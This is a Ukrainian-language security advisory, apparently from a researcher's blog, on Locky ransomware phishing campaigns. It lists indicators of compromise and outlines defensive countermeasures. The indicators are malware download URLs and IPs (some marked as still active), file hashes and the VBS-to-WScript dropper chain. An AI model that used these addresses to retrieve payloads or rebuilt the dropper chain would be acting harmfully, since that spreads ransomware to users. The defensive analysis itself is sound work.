89.96.90.14 80 HTTP 366 tecnigrafite.com GET /8etyfh3ni? HTTP/1.1
77.123.218.185 80 HTTP 367 derainlay.info GET /p66/8etyfh3ni HTTP/1.1
89.96.90.14 80 HTTP 365 securmailbox.it GET /8etyfh3ni? HTTP/1.1

усі три поки активні

завантаження >

Filename zzXOPtNyW.exe
Size 606KiB (620544 bytes)
SHA256 5ccb49b3a3bb1cf0cbeaebf50ed30344e4b87f19ca2d6dad578d5210de904d65

По зразкам поведінка стандартна – після активації перевірка параметрів системи, шифрування не розпочате, самознищення, мережеві комунікації відсутні.

Що можна було зробити аби уникнути інфікування ?

  1. Завантаження архіву із скриптом можна було завадити через блокування VBS та JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис VBS, JS приманки на диск (розпаковку) можна було попередити заборонивши створення VBS, JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск VBS, JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу WSCript.exe (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

досі активні!

js
194.116.187.130 80 HTTP 387 basedow-bilder.de GET /jhgf54y6??UuhgwJfbwT=UuhgwJfbwT
184.168.92.220 80 HTTP 373 robsacks.com GET /873gfhi3f3r??mywoMVI=mywoMVI
184.168.92.220 80 HTTP 373 robsacks.com GET /873gfhi3f3r??NRyvRxz=NRyvRxz
109.86.76.228 80 HTTP 290 sherylbro.net GET /p66/ldjivy78?wLoxrGw=wLoxrGw
vbs
89.96.90.14 80 HTTP 366 tecnigrafite.com GET /8etyfh3ni? HTTP/1.1
77.123.218.185 80 HTTP 367 derainlay.info GET /p66/8etyfh3ni HTTP/1.1
89.96.90.14 80 HTTP 365 securmailbox.it GET /8etyfh3ni? HTTP/1.1

вже не активні

5.2.88.79 80 HTTP 300 embutidosanezcar.com GET /jhgf54y6??UuhgwJfbwT=UuhgwJfbwT
98.124.251.69 80 HTTP 298 theceocforeporter.com GET /873gfhi3f3r??mywoMVI=mywoMVI
98.124.251.69 80 HTTP 298 theceocforeporter.com GET /873gfhi3f3r??NRyvRxz=NRyvRxz
77.122.77.216 80 HTTP 321 sherylbro.net GET /p66/873gfhi3f3r%20robsacks.com/873gfhi3f3r??NRyvRxz=NRyvRxz
86.109.170.198 80 HTTP 296 globoart.es GET /ldjivy$?S(@M?%0F?uPcATUcPa=uPcATUcPa
46.175.146.50 80 HTTP 294 sherylbro.net GET /p66/ldjivy78?uPcATUcPa=uPcATUcPa
66.71.182.143 80 HTTP 297 maurocesari.it GET /ldjh??L?%01]?M?%0F?wLoxrGw=wLoxrGw

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_Locky_220917

Візьміть також до уваги мережеві маркери по сьогоднішній розсилці
dropperr – VBS файли
payload – EXE (Locky Ransomware) – уже розбирав раніше

Мережеві IOC:

!посилання досі активні!
(отримано з VBS скрипта який був переданий на аналіз)
98.124.251.69 HTTP 362 anderlaw.com GET /jhdsgvc74? HTTP/1.1 
95.67.75.154 HTTP 360 ideathlike.net GET /p66/jhdsgvc74 HTTP/1.1
85.17.24.201 HTTP 356 arktupala.com GET /jhdsgvc74? HTTP/1.1
Додаткові адреси пов’язані із даною кампанією:
h11p://animal-naturals.net/jhdsgvc74
h11p://antwerpiastamps.be/jhdsgvc74
h11p://amesatarragona.com/jhdsgvc74
h11p://amatuermatch.org/jhdsgvc74
h11p://allesandradesigns.com/jhdsgvc74

Схема атаки:

email > attach (7z) > VBS >  WScript > URL > GET > %temp%\%random%.exe

Маркери IOC:

File Name Invoice_file_70855.vbs
SHA-256 Hash Identifier 5C8ED74A3E1AAC74E48F84B2DE6B3DF3068DAAA3FEFB3F5D4D65A052E9D95007
File Size 10934 bytes
File Type ASCII text

срипт містить три адреси які перебирає з метою завантаження основної частини

298.124.251.69 HTTP 362 anderlaw.com GET /jhdsgvc74? HTTP/1.1 
95.67.75.154  HTTP 360 ideathlike.net GET /p66/jhdsgvc74 HTTP/1.1
85.17.24.201 HTTP 356 arktupala.com GET /jhdsgvc74? HTTP/1.1

у випадку доступності одного із трьох джерел – іде завантаження основної частини у %temp%\random.exe

File Name yWNeyvWNFWo.exe
MD5 Hash Identifier 693EF59145AA6B9E329F91538855EF64
SHA-1 Hash Identifier E3067D7C7227AF026C0ABFBDF7B417C4E294F380
SHA-256 Hash Identifier 3A810CBAD7296F83122C4A16B935A723D8019419069A55C939D93C246ABED2AC
File Size 670208 bytes

На тестовій системі шифрування не відбулося, засобів закріплення виявлено не було, зразок видалив себе.

Що можна було зробити аби уникнути інфікування ?

  1. Завантаження архіву з скриптом можна було завадити через блокування VBS та JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис VBS, JS приманки на диск (розпаковку) можна було попередити заборонивши створення VBS, JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск VBS, JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу WSCript.exe (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5 кроків, упередження хоча би одного з них = зупинка атаки.

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR